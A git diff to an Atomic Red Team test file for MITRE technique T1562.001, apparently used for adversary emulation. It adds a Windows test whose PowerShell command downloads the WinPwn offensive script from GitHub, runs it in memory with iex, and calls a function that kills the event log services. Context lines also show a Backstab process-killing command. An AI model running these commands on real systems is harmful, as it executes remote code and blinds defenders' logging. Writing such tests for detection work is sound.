diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 36b02dd0..e40b7c59 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -633,4 +633,13 @@ atomic_tests:
     command: '& $env:temp\Backstab64.exe -k -n #{process_name}'
     name: powershell
     elevation_required: true
-  
+- name: WinPwn - Kill the event log services for stealth
+  description: Kill the event log services for stealth via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      inv-phantom -consoleoutput -noninteractive  
+    name: powershell